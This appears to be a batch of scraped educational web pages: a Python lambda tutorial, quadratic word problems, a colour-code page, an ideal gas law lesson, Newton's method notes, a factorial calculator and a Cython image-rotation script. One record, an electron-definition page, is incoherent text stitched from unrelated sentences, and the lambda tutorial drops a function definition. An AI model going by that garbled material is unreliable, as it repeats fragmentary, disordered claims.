"# Anonymous / Lambda Function\n\n## Anonymous / Lambda Function\n\nIn Python, anonymous function is a function that is defined without a name.\n\n• Normal functions are defined using the 'def' keyword.\n• Anonymous functions are defined using the 'lambda' keyword.\n\n• ## Rules of Lambda Function\n\n• Lambda functions are small functions usually not more than a line.\n• The body of lambda functions consists of only one expression.\n• Lambda functions can have any number of arguments just like a normal function.\n• The result of the expression is the value when the lambda is applied to an argument.\n• There is no need for any return statement in lambda function.\n• It cannot contain commands or multiple expressions.\n• Lambda functions have their own local namespace and cannot access variables other than those in their parameter list and those in the global namespace.\n\n• ## Syntax\n\n``` lambda [arg1,arg2,....,argn]:expression\n```\n\n## Example 1: Normal Function\n\n```# Function to adds two numbers and returns the output\nreturn x + y\n\n# Calling the Function\n\nOutput:\n35\n```\n\n## Example 2: Lambda Function\n\n```# Lambda Function to adds two numbers,returns the output and called through the variable\nsum = lambda x, y: x + y\n\n# call the lambda function\nprint(\"Sum of two numbers : \",sum(10,25))\n\nOutput:\nSum of two numbers : 35\n```\n• Here we are using two arguments x and y.\n• Expression after colon is the body of the lambda function.\n• Lambda function has no name and is called through the variable it is assigned to.\n\n• (OR)\n\n```# Lambda Function to adds two numbers and returns the output\n(lambda x, y: x + y)(10,25)\n\nOutput:\n35\n```\n\n## Example 3 :\n\n```# Program to filter out only the odd items from a list\nmylist = [1 , 5 , 15 , 22 , 58 , 98]\noddlist = list(filter(lambda x: (x%2 != 0), mylist))\nprint(oddlist)\n\nOutput:\n[1, 5, 15]\n```\n\n## Example 4:\n\n```# Program to display cube of each item in a list using map()\nmylist2 = [1, 2, 3, 4, 5, 6, 7]\ncubelist = list(map(lambda x: x ** 3, mylist2))\nprint(cubelist)\n\nOutput:\n[1, 8, 27, 64, 125, 216, 343]\n```\nTotal Website Visits: 40451"
http://www.mathspadilla.com/3ESO/Unit6-Equations/problems2.html
"# problems\n\n1. Calculate two consecutive natural numbers whose product equals 992.",
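(The worked solution on the original page was an equation image; the algebra is restated here.) Let the numbers be $x$ and $x+1$. Then $x(x+1) = 992$, so $x^2 + x - 992 = 0$ and $x = \frac{-1 \pm \sqrt{1 + 3968}}{2} = \frac{-1 \pm 63}{2}$. Taking the positive root gives $x = 31$, so the numbers are 31 and 32.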
"2. Calculate the dimensions of a rectangle which has a perimeter of 24 m and an area of 32 m2.",
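(Again restating the algebra that the original page rendered as an image.) With length $l$ and width $w$: $2(l + w) = 24$ gives $l + w = 12$, and $lw = 32$. So $l$ and $w$ are the roots of $x^2 - 12x + 32 = 0 = (x - 4)(x - 8)$, giving dimensions 8 m by 4 m. This matches the NOTE below: with $a = 1$, the equation is $x^2 - sx + p = 0$ with $s = 12$ (half the perimeter) and $p = 32$ (the area).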
"NOTE: If a = 1, the equation is x2 – sx +p = 0, where “s” is the sum of the solutions and “p” is their product.\n\nExercises: solve the following problems and check the solution/s:\n\n1.- The product of a number increased 3 units by the same number decreased 4 units, is 98. Find out the number.\n\n2.- Calculate the perimeter of a swimming pool, knowing that its length is 3/4 its widht and the area is 12m2.\n\n3.- Calculate the length of the catheti of an isosceles triangle whose area is 50m2.\n\n4.- Find the quadratic equation whose solutions are -3 and 7 and check it.\n\nSolutions: 1) -10 or 11; 2) 14 m; 3) 10 m; 4) x2 - 4x - 21 = 0"
https://www.colorhexa.com/40eb1a
"# #40eb1a Color Information\n\nIn a RGB color space, hex #40eb1a is composed of 25.1% red, 92.2% green and 10.2% blue. Whereas in a CMYK color space, it is composed of 72.8% cyan, 0% magenta, 88.9% yellow and 7.8% black. It has a hue angle of 109.1 degrees, a saturation of 83.9% and a lightness of 51.2%. #40eb1a color hex could be obtained by blending #80ff34 with #00d700. Closest websafe color is: #33ff33.\n\n• R 25\n• G 92\n• B 10\nRGB color chart\n• C 73\n• M 0\n• Y 89\n• K 8\nCMYK color chart\n\n#40eb1a color description : Vivid lime green.\n\n# #40eb1a Color Conversion\n\nThe hexadecimal color #40eb1a has RGB values of R:64, G:235, B:26 and CMYK values of C:0.73, M:0, Y:0.89, K:0.08. Its decimal value is 4254490.\n\nHex triplet RGB Decimal 40eb1a `#40eb1a` 64, 235, 26 `rgb(64,235,26)` 25.1, 92.2, 10.2 `rgb(25.1%,92.2%,10.2%)` 73, 0, 89, 8 109.1°, 83.9, 51.2 `hsl(109.1,83.9%,51.2%)` 109.1°, 88.9, 92.2 33ff33 `#33ff33`\nCIE-LAB 82.151, -75.204, 76.126 32.007, 60.578, 10.983 0.309, 0.585, 60.578 82.151, 107.008, 134.651 82.151, -70.851, 97.862 77.832, -62.8, 46.116 01000000, 11101011, 00011010\n\n# Color Schemes with #40eb1a\n\n• #40eb1a\n``#40eb1a` `rgb(64,235,26)``\n• #c51aeb\n``#c51aeb` `rgb(197,26,235)``\nComplementary Color\n• #a9eb1a\n``#a9eb1a` `rgb(169,235,26)``\n• #40eb1a\n``#40eb1a` `rgb(64,235,26)``\n• #1aeb5c\n``#1aeb5c` `rgb(26,235,92)``\nAnalogous Color\n• #eb1aa9\n``#eb1aa9` `rgb(235,26,169)``\n• #40eb1a\n``#40eb1a` `rgb(64,235,26)``\n• #5c1aeb\n``#5c1aeb` `rgb(92,26,235)``\nSplit Complementary Color\n• #eb1a40\n``#eb1a40` `rgb(235,26,64)``\n• #40eb1a\n``#40eb1a` `rgb(64,235,26)``\n• #1a40eb\n``#1a40eb` `rgb(26,64,235)``\n• #ebc51a\n``#ebc51a` `rgb(235,197,26)``\n• #40eb1a\n``#40eb1a` `rgb(64,235,26)``\n• #1a40eb\n``#1a40eb` `rgb(26,64,235)``\n• #c51aeb\n``#c51aeb` `rgb(197,26,235)``\n• #2baa0f\n``#2baa0f` `rgb(43,170,15)``\n• #31c111\n``#31c111` `rgb(49,193,17)``\n• #37d913\n``#37d913` `rgb(55,217,19)``\n• #40eb1a\n``#40eb1a` `rgb(64,235,26)``\n• #54ed31\n``#54ed31` `rgb(84,237,49)``\n• #67ef49\n``#67ef49` `rgb(103,239,73)``\n• #7bf160\n``#7bf160` `rgb(123,241,96)``\nMonochromatic Color\n\n# Alternatives to #40eb1a\n\nBelow, you can see some colors close to #40eb1a. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #74eb1a\n``#74eb1a` `rgb(116,235,26)``\n• #63eb1a\n``#63eb1a` `rgb(99,235,26)``\n• #51eb1a\n``#51eb1a` `rgb(81,235,26)``\n• #40eb1a\n``#40eb1a` `rgb(64,235,26)``\n• #2feb1a\n``#2feb1a` `rgb(47,235,26)``\n• #1deb1a\n``#1deb1a` `rgb(29,235,26)``\n• #1aeb28\n``#1aeb28` `rgb(26,235,40)``\nSimilar Colors\n\n# #40eb1a Preview\n\nThis text has a font color of #40eb1a.\n\n``<span style=\"color:#40eb1a;\">Text here</span>``\n#40eb1a background color\n\nThis paragraph has a background color of #40eb1a.\n\n``<p style=\"background-color:#40eb1a;\">Content here</p>``\n#40eb1a border color\n\nThis element has a border color of #40eb1a.\n\n``<div style=\"border:1px solid #40eb1a;\">Content here</div>``\nCSS codes\n``.text {color:#40eb1a;}``\n``.background {background-color:#40eb1a;}``\n``.border {border:1px solid #40eb1a;}``\n\n# Shades and Tints of #40eb1a\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. 
In this example, #010600 is the darkest color, while #f5fef2 is the lightest one.\n\n• #010600\n``#010600` `rgb(1,6,0)``\n• #061802\n``#061802` `rgb(6,24,2)``\n• #0b2a04\n``#0b2a04` `rgb(11,42,4)``\n• #0f3c05\n``#0f3c05` `rgb(15,60,5)``\n• #144e07\n``#144e07` `rgb(20,78,7)``\n• #186008\n``#186008` `rgb(24,96,8)``\n• #1d720a\n``#1d720a` `rgb(29,114,10)``\n• #21840c\n``#21840c` `rgb(33,132,12)``\n• #26960d\n``#26960d` `rgb(38,150,13)``\n• #2ba80f\n``#2ba80f` `rgb(43,168,15)``\n• #2fba10\n``#2fba10` `rgb(47,186,16)``\n• #34cc12\n``#34cc12` `rgb(52,204,18)``\n• #38de13\n``#38de13` `rgb(56,222,19)``\n• #40eb1a\n``#40eb1a` `rgb(64,235,26)``\n• #4fed2c\n``#4fed2c` `rgb(79,237,44)``\n• #5eee3e\n``#5eee3e` `rgb(94,238,62)``\n• #6df050\n``#6df050` `rgb(109,240,80)``\n• #7cf162\n``#7cf162` `rgb(124,241,98)``\n• #8bf374\n``#8bf374` `rgb(139,243,116)``\n• #9af486\n``#9af486` `rgb(154,244,134)``\n• #a9f698\n``#a9f698` `rgb(169,246,152)``\n• #b8f8aa\n``#b8f8aa` `rgb(184,248,170)``\n• #c7f9bc\n``#c7f9bc` `rgb(199,249,188)``\n• #d6fbce\n``#d6fbce` `rgb(214,251,206)``\n• #e6fce0\n``#e6fce0` `rgb(230,252,224)``\n• #f5fef2\n``#f5fef2` `rgb(245,254,242)``\nTint Color Variation\n\n# Tones of #40eb1a\n\nA tone is produced by adding gray to any pure hue. In this case, #7d8b7a is the less saturated color, while #34fe07 is the most saturated one.\n\n• #7d8b7a\n``#7d8b7a` `rgb(125,139,122)``\n• #779570\n``#779570` `rgb(119,149,112)``\n• #719e67\n``#719e67` `rgb(113,158,103)``\n• #6ba85d\n``#6ba85d` `rgb(107,168,93)``\n• #65b253\n``#65b253` `rgb(101,178,83)``\n• #5ebb4a\n``#5ebb4a` `rgb(94,187,74)``\n• #58c540\n``#58c540` `rgb(88,197,64)``\n• #52ce37\n``#52ce37` `rgb(82,206,55)``\n• #4cd82d\n``#4cd82d` `rgb(76,216,45)``\n• #46e124\n``#46e124` `rgb(70,225,36)``\n• #40eb1a\n``#40eb1a` `rgb(64,235,26)``\n• #3af510\n``#3af510` `rgb(58,245,16)``\n• #34fe07\n``#34fe07` `rgb(52,254,7)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #40eb1a is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population"
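The hex-to-RGB and RGB-to-HSL conversions above can be checked with Python's standard library. This snippet is illustrative and not part of the original page; note that colorsys works in the 0 to 1 range and returns hue, lightness, saturation in that order:

```python
import colorsys

r, g, b = 0x40 / 255, 0xeb / 255, 0x1a / 255    # #40eb1a -> (64, 235, 26), scaled to 0..1
h, l, s = colorsys.rgb_to_hls(r, g, b)          # note the HLS (not HSL) ordering
print(round(h * 360, 1), round(s * 100, 1), round(l * 100, 1))   # 109.1 83.9 51.2
```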
https://www.mometrix.com/academy/ideal-gas-law/
"What is the Ideal Gas Law?\n\nIdeal Gas Law\n\nThe Ideal Gas Law is P times V equals n times R times T. P stands for pressure, V stands for volume, N stands for number of moles, in other words, the amount. Moles are used to measure chemical substances.\n\nT is the absolute temperature, always in Kelvin, and R is a universal gas constant. R takes different forms depending on the units that are needed. R can look like this, or R can look like this.\n\nNotice the only difference here is the unit for pressure. Here, kilopascals are used, and here atmospheres are used. I want to go through an example problem so we can better understand the practical application of this gas law.\n\nThe example problem we have is: You have 30.0 liters of nitrogen gas at 373 Kelvin and 203 kilopascals. How many moles of nitrogen gas do you have? We’re looking for moles here. Remember, “moles” is N.\n\nI’m going to put “N?”, because that’s what we’re looking for here. Let’s go ahead and write the equation. PV equals nRT. We’re looking for pressure. We know that pressure is expressed in those units.\n\nPressure is 203kPa times volume, which is 30.0 liters. We’re looking for moles. We don’t know what that is yet, so we’ll just leave n there. Then, we’re looking for R. We need to know which one to use.\n\nThe only difference here is the units. Since we see kilopascals right here, that means we must be looking for that constant right there. We have 8.31 times temperature (373 Kelvin). From here, we just need to divide by this right here.\n\nBecause we’re using algebra here, what we do to one side of the equation we also have to do the other. We’ll divide this side by the same thing. All of this right here crosses out, because we’re dividing one thing by the same thing.\n\nThe only thing left here is n, which is what we’re looking for. I’ll save you having to go through all the math here, but what you would do is just multiply these two numbers and then divide it by these two numbers that are multiplied by each other.\n\nN equals 1.96. Now, we need to know what unit to use. In this case, we’re using moles, so I’ll just abbreviate it mol. That’s the answer we were looking for. Now, if you’re wondering exactly how we got the units, everything has to cross out for something like this to work.\n\nWe see kilopascals here and there, so that can cross out. We see liters here and here, so that can cross out. Right here, we have moles and Kelvin (times 373 Kelvin), so those right there cross out.\n\nIf you look at it like this, kPa is over moles-K, and then we’re multiplying like this. Actually, we don’t need that number. We’re just looking at units now. This is what the units actually look like.\n\nThat got crossed out from up there. We crossed that out like that, and then we’re just left with moles. That’s where we got the unit here. That’s the answer right there. That’s the practical application.\n\nBecause you have this equation now, if any of these are missing (if any of these variables are missing), you can find the missing one as long as you have all the other information.\n\nNow, obviously, the missing information is never going to be this constant, because you already know it, but if you’re wondering what the pressure, the volume, and the number of moles or the temperature is, as long as you know the other three variables, you can figure out that missing variable.\n\n381353\n\nby Mometrix Test Preparation | Last Updated: August 15, 2019"
http://www.stopyourdivorce.com/journal/rocketship-x-m-full-movie-9dfd5a
"It was discovered in 1897 by J.J. Thompson. The electron configuration of an element describes how electrons are distributed in its atomic orbitals. Now that we understand the difference between sigma and $$\\pi$$ electrons, we remember that the $$\\pi$$ bond is made up of loosely held electrons that form a diffuse cloud which can be easily distorted. Introduction to Chemistry. They have a charge of negative one elementary charge and a mass that is 1/1836 that of a proton. It is a very small piece of matter and energy.\n\n2) A particle of matter that has a negative electric charge of 4.8 E -10 esu and a mass of 9.1E -28g or 1/1837 the mass of a proton. Proton, Electron, Neutron - Definition - Formula - Application - Worksheet understanding the basic concept of chemistry study, especially organic chemistry They are known as elementary particles because they can no be broken down into smaller particles. Electron configurations of atoms follow a standard notation in which all electron-containing atomic subshells (with the number of electrons they hold written in superscript) are placed in a sequence. Because it measures the attraction, or affinity, of the atom for the added electron. 1) A subatomic particle having a mass of 0.00054858 amu and a charge of 1-.\n\nPractical reason: It is mandatory for heavy-element chemistry (i.e., beyond organic chemistry) Electron Density in (Relativistic) Quantum Theory Markus Reiher. Search for: Electron Orbitals . Electron definition is - an elementary particle consisting of a charge of negative electricity equal to about 1.602 × 10—19 coulomb and having a mass when at rest of about 9.109 × 10—31 kilogram or about 1/1836 that of a proton.\n\nDistinguish between electron orbitals in the Bohr model versus the quantum mechanical orbitals; Key Points .\n\nIntroduction to Quantum Theory. Definition of electron. Definition of Electron. For most atoms, energy is released when an electron is added. Electrons a sub-atomic particles.\n\nFor example, the electron configuration of sodium is 1s\n\nElectron configuration is the distribution of electrons of an atom or molecule (or other physical structure) in atomic or molecular orbitals; for example, the electron configuration of a neon atom is 1s 2 2s 2 2p 6.Electronic configurations describe electrons as each moving independently in an orbital, in an average field created by all other orbitals. Learning Objective.\n\nThe energy change that occurs when an electron is added to a neutral atom in the gaseous state to form a negative ion is called electron affinity. They can be found as a constituent part of an atom orbiting around the nucleus or in the free state.\n\nGRC 2010 Introduction World of relativistic quantum theory Scalar−relativistic formulations by neglect of spin−dependent terms or use of ECPs 1−component Quantum Electrodynamics Local QED Model Potentials 4−comp.\n\nMobility Of $$\\pi$$ Electrons and Unshared Electron Pairs. Chemistry Electron Affinity: Definition & Examples with Equations & values in Periodic Table."
http://mathonline.wikidot.com/newton-s-method-for-approximating-roots
"Newton's Method for Approximating Roots\n\n# Newton's Method for Approximating Roots\n\nWe will now look at another method for approximating roots of functions. Suppose that $y = f(x)$, and let $\\alpha$ be a root of $f$, and suppose that $x_0$ is a first approximation of the root $\\alpha$ of $f$. Now consider the tangent line to the graph of $f$ at the point $(x_0, f(x_0))$. Provided that this tangent line does not have slope $0$, then this tangent line will have a root of its own that will approximately be equal to $\\alpha$.",
"The equation of this tangent line can be given by the following equation:\n\n(1)\n\\begin{align} \\quad p_1(x) = f(x_0) + f'(x_0)(x - x_0) \\end{align}\n\nIf we set $p_1(x) = 0$ and solve for $x_1$ as the $x$-intercept of the tangent line $p_1(x)$, then we obtain:\n\n(2)\n\\begin{align} \\quad p_1(x) = f(x_0) + f'(x_0)(x - x_0) \\\\ \\quad 0 = f(x_0) + f'(x_0)(x_1 - x_0) \\\\ \\quad x_1 = x_0 -\\frac{f(x_0)}{f'(x_0)} \\end{align}\n\nWe now take $x_1$ (the root of the first tangent line) to be an approximation of $\\alpha$. If we now look at the tangent line at $(x_1, f(x_1))$ on $f$, then we obtain a new tangent line, and provided that the slope of this tangent line is not $0$, then this tangent line has a root of its own that is an even better approximation of $\\alpha$.",
null,
"The equation of this tangent line can be given by the following equation:\n\n(3)\n\\begin{align} \\quad p_2(x) = f(x_1) + f'(x_1)(x - x_1) \\end{align}\n\nOnce again, if we set $p_1(x) = 0$ and solve for $x_2$ as the x-intercept of the tangent line $p_2(x)$, then we obtain:\n\n(4)\n\\begin{align} \\quad x_2 = x_1 -\\frac{f(x_1)}{f'(x_1)} \\end{align}\n\nIn fact, the more we repeat this procedure, the closer and closer our approximation gets to $\\alpha$. For $n + 1$ iterations of this procedure and provided that $f'(x_i) \\neq 0$ for $i = 1, 2, ..., n$, we obtain the following general formula for the $x$-intercepts of the corresponding tangent lines as approximations to $\\alpha$:\n\n(5)\n\\begin{align} \\quad x_{n+1} = x_n - \\frac{f(x_n)}{f'(x_n)} \\end{align}\n Theorem 1 (Newton's Method): Suppose that $f$ is a differentiable function that contains the root $\\alpha$, and $x_0$ is an approximation of $\\alpha$. Step 1: A better approximation of $x_1$ can be obtained as $x_1 = x_0 - \\frac{f(x_0)}{f'(x_0)}$ provided that $f'(x_0) \\neq 0$. Step n + 1: A better approximation of $x_{n}$ can be obtained as $x_{n+1} = x_n - \\frac{f(x_n)}{f'(x_n)}$ provided that $f'(x_n) \\neq 0$.\n\nOne advantage of Newton's Method is that the sequence of approximations $\\{ x_n \\}$ tend to converge much more quickly towards the root $\\alpha$. The major disadvantage of Newton's Method is that the sequence of approximations $\\{ x_n \\}$ may not converge to $\\alpha$ if we do not choose an initial approximation $x_0$ that is sufficiently close to $\\alpha$. We discuss this potential problem on the Error Analysis of Newton's Method for Approximating Roots page."
] | [
null,
"http://mathonline.wdfiles.com/local--files/newton-s-method-for-approximating-roots/Screen%20Shot%202015-01-21%20at%208.39.37%20AM%281%29.png",
null,
"http://mathonline.wdfiles.com/local--files/newton-s-method-for-approximating-roots/Screen%20Shot%202015-01-21%20at%208.56.00%20AM.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.90842503,"math_prob":1.0000012,"size":2453,"snap":"2022-40-2023-06","text_gpt3_token_len":690,"char_repetition_ratio":0.18089016,"word_repetition_ratio":0.123222746,"special_character_ratio":0.29922545,"punctuation_ratio":0.087318085,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000079,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,5,null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-07T03:05:50Z\",\"WARC-Record-ID\":\"<urn:uuid:9cc1a7af-a6d8-4729-b685-8b7dd10966a1>\",\"Content-Length\":\"19055\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e6f940bb-9f0e-43d6-8cd5-40c9bd9316f7>\",\"WARC-Concurrent-To\":\"<urn:uuid:01951180-cb24-4c88-9a1c-8600a766ff9b>\",\"WARC-IP-Address\":\"107.20.139.170\",\"WARC-Target-URI\":\"http://mathonline.wikidot.com/newton-s-method-for-approximating-roots\",\"WARC-Payload-Digest\":\"sha1:73ASFHAWEHRECKDMEJETV4YXDD4PVEDS\",\"WARC-Block-Digest\":\"sha1:NIEELMNVHIRKXDCUBW3JV4O3BVJ3PHLY\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337906.7_warc_CC-MAIN-20221007014029-20221007044029-00756.warc.gz\"}"} |
https://www.stattrek.com/online-calculator/factorial.aspx | [
"# Factorial Calculator\n\nFind the factorial of any number between 1 and 170. For help in using the calculator, read the Frequently-Asked Questions or review the Sample Problem.\n\n• Enter a number in the unshaded text box.\n• Click the Calculate button to display the factorial value of that number.\n Number ( n ) n Factorial\n\nInstructions: To find the answer to a frequently-asked question, simply click on the question.\n\n### What is a factorial?\n\nIn general, n objects can be arranged in n(n - 1)(n - 2) ... (3)(2)(1) ways. This product is represented by the symbol n!, which is called n factorial. By convention, 0! = 1.\n\nThus, 0! = 1; 2! = (2)(1) = 2; 3! = (3)(2)(1) = 6; 4! = (4)(3)(2)(1) = 24; 5! = (5)(4)(3)(2)(1) = 120; and so on.\n\nFactorials can get very big, very fast. The term 170! is the largest factorial that the Factorial Calculator can evaluate. The term 171! produces a result that is too large to be processed by this software; it is bigger than 10 to the 308th power.\n\nFor an example that computes a factorial, see Sample Problem 1.\n\n### What is E-Notation?\n\nE notation is a way to write numbers that are too large or too small to be concisely written in a decimal format.\n\nWith E notation, the letter E represents \"times ten raised to the power of\". Here is an example of a number written using E notation:\n\n3.02E12 = 3.02 * 1012 = 3,020,000,000,000\n\nThe Factorial Calculator uses E notation to express very large numbers. For example, the term 170! is expressed in E notation as 7.25741561530799E+306.\n\n### How accurate is E-Notation?\n\nIf the Factorial Calculator displays a result in E notation, that result is not exact. It is an approximation. At best, it is accurate to within 16 significant digits.\n\n## Sample Problem\n\n1. A standard deck of playing cards has 13 spades. How many ways can these 13 spades be arranged?\n\nSolution:\n\nThe solution to this problem involves calculating a factorial. Since we want to know how 13 cards can be arranged, we need to compute the value for 13 factorial.\n\n13! = (1)(2)(3)(4)(5)(6)(7)(8)(9)(10)(11)(12)(13) = 6,227,020,800\n\nNote that the above calculation is a little cumbersome to compute by hand, but it can be easily computed using the Factorial Calculator. To use the Factorial Calculator, do the following:\n\n• Enter \"13\" for n.\n• Click the \"Calculate\" button.\n\nThe answer, 6,227,020,800, is displayed in the \"n Factorial\" textbox."
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8990497,"math_prob":0.9968584,"size":1574,"snap":"2019-51-2020-05","text_gpt3_token_len":456,"char_repetition_ratio":0.12866242,"word_repetition_ratio":0.0,"special_character_ratio":0.31575602,"punctuation_ratio":0.17428571,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99621916,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-14T06:00:44Z\",\"WARC-Record-ID\":\"<urn:uuid:7f4a5242-2a3a-4980-832b-53b528c5a196>\",\"Content-Length\":\"65751\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:05fa00a5-c797-4987-9ad8-4df393d02e82>\",\"WARC-Concurrent-To\":\"<urn:uuid:9252b718-f4a4-426e-b088-2ec5229c74cf>\",\"WARC-IP-Address\":\"35.153.87.42\",\"WARC-Target-URI\":\"https://www.stattrek.com/online-calculator/factorial.aspx\",\"WARC-Payload-Digest\":\"sha1:RZMQ3AGO3J67DLPBGNOIX5QLI7NNC43M\",\"WARC-Block-Digest\":\"sha1:PC3XML2GWJP6HUD6ILEGUSVATEO5NVQQ\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540584491.89_warc_CC-MAIN-20191214042241-20191214070241-00163.warc.gz\"}"} |
https://www.adamponting.com/diagonal-rotation/ | [
"# Diagonal rotation\n\nSage Cython: To run, type `%attach PicDiagRotate.pyx` and `OK()` at the Sage command line, or paste into a Sage notebook with `%cython` as the first line.\n\n```#PicDiagRotate.pyx\nimport numpy as np\ncimport numpy as np\nfrom scipy import misc\nDEF side=512\nDEF halfside=side/2\ncpdef OK():\ncdef int i,w,row,loops,lps,L,R,t\ncdef np.ndarray[np.uint8_t, ndim=3] a\nfn=\"tiger-09.png\" #a 512x512 colour png\nfor w in xrange(1,halfside+1):\nfor row in xrange(w,halfside+1):\n#row 1 is the 4 pixels at centre, 256 is around edge of pic.\nif row>1: #do twice more for each row outside the first\nloops=2\nelse:\nloops=1\nfor lps in xrange(loops):\nL=halfside-row\nR=side-1-L\nfor i in xrange(3): #store temp pixel\nt[i]=a[L][L][i]\nfor i in xrange(L,R,1):\t#move left column down\na[L][i]=a[L][i+1]\nfor i in xrange(L,R): #move top row to the left\na[i][R]=a[i+1][R]\nfor i in xrange(R,L,-1): #move right column up\na[R][i]=a[R][i-1]\nfor i in xrange(R,L,-1):#move bottom row to right\na[i][L]=a[i-1][L]\nfor i in xrange(3): #put temp back\na[L+1][L][i]=t[i]\nprint w\nmisc.imsave('tpics/%05d.png' % w,a) #NB make a folder called 'tpics' first.\n```"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.6153181,"math_prob":0.9604242,"size":1116,"snap":"2023-40-2023-50","text_gpt3_token_len":396,"char_repetition_ratio":0.14748201,"word_repetition_ratio":0.0,"special_character_ratio":0.3405018,"punctuation_ratio":0.14900662,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99340653,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-23T11:07:11Z\",\"WARC-Record-ID\":\"<urn:uuid:6de75489-93da-4259-92b4-6190bef06654>\",\"Content-Length\":\"43265\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6d0f3dab-c2cd-4b10-b5be-db57afaec66c>\",\"WARC-Concurrent-To\":\"<urn:uuid:dcb3fcde-5b61-4983-bb74-cca9a922d745>\",\"WARC-IP-Address\":\"103.27.34.18\",\"WARC-Target-URI\":\"https://www.adamponting.com/diagonal-rotation/\",\"WARC-Payload-Digest\":\"sha1:ABOD2HHBVFCA6EBPK6IQD3MCEEV6BO2X\",\"WARC-Block-Digest\":\"sha1:DXKOPSTA5YXSMOITFAIKQZAZP27X3RNF\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233506480.7_warc_CC-MAIN-20230923094750-20230923124750-00518.warc.gz\"}"} |
https://testbook.com/question-answer/a-gear-train-shown-in-the-figure-consists-of-gears--58f600f7995a2d4c28767cda | [
"A gear train shown in the figure consists of gears P, Q, R and S. Gear Q and gear R are mounted on the same shaft. All the gears are mounted on parallel shafts and the number of teeth of P, Q, R and S are 24, 45, 30 and 80, respectively. Gear P is rotating at 400 rpm. The speed (in rpm) of the gear S is ________",
null,
"This question was previously asked in\nPY 8: GATE ME 2017 Official Paper: Shift 2\nView all GATE ME Papers >\n\nAnswer (Detailed Solution Below) 119 - 121\n\nFree\nCT 1: Ratio and Proportion\n4927\n10 Questions 16 Marks 30 Mins\n\nDetailed Solution\n\nConcept:\n\n$$\\frac{{{N_Q}}}{{{N_P}}} = \\frac{{{T_P}}}{{{T_Q}}} = \\frac{{24}}{{45}} \\Rightarrow \\frac{{{N_Q}}}{{400}} = \\frac{{24}}{{45}} \\Rightarrow {N_Q} = 400 \\times \\frac{{24}}{{45}} = \\frac{{640}}{3}$$\n\n$$\\Rightarrow \\frac{{{N_Q}}}{{{N_s}}} = \\frac{{{T_S}}}{{{T_Q}}} = \\frac{{80}}{{45}} \\Rightarrow {N_s} = {N_Q} \\times \\frac{{{T_Q}}}{{{T_s}}} = \\frac{{640}}{3} \\times \\frac{{45}}{{80}} = 120\\;rpm$$"
] | [
null,
"https://storage.googleapis.com/tb-img/production/17/04/Capture%201234567891017.PNG",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.7265144,"math_prob":0.9996481,"size":1003,"snap":"2022-05-2022-21","text_gpt3_token_len":325,"char_repetition_ratio":0.16716717,"word_repetition_ratio":0.0,"special_character_ratio":0.4336989,"punctuation_ratio":0.08695652,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99894696,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-17T08:05:35Z\",\"WARC-Record-ID\":\"<urn:uuid:6ef7bb23-825b-4b6b-b1ff-f997fcf1dae0>\",\"Content-Length\":\"121738\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a2307ac6-c2d7-49b0-b9f2-7f410dfd5edd>\",\"WARC-Concurrent-To\":\"<urn:uuid:b04872aa-4a57-4167-9d3b-095e46c0e3a7>\",\"WARC-IP-Address\":\"172.67.30.170\",\"WARC-Target-URI\":\"https://testbook.com/question-answer/a-gear-train-shown-in-the-figure-consists-of-gears--58f600f7995a2d4c28767cda\",\"WARC-Payload-Digest\":\"sha1:SXLMDU73TOPHSNXX4NHVQV2GCZTDOQH2\",\"WARC-Block-Digest\":\"sha1:HE5ZY5RDUJUNQAG3WBCIHMBWG5XTNAJQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320300343.4_warc_CC-MAIN-20220117061125-20220117091125-00035.warc.gz\"}"} |
https://www.groundai.com/project/scalar-radius-of-the-pion-in-the-kroll-lee-zumino-renormalizable-theory/ | [
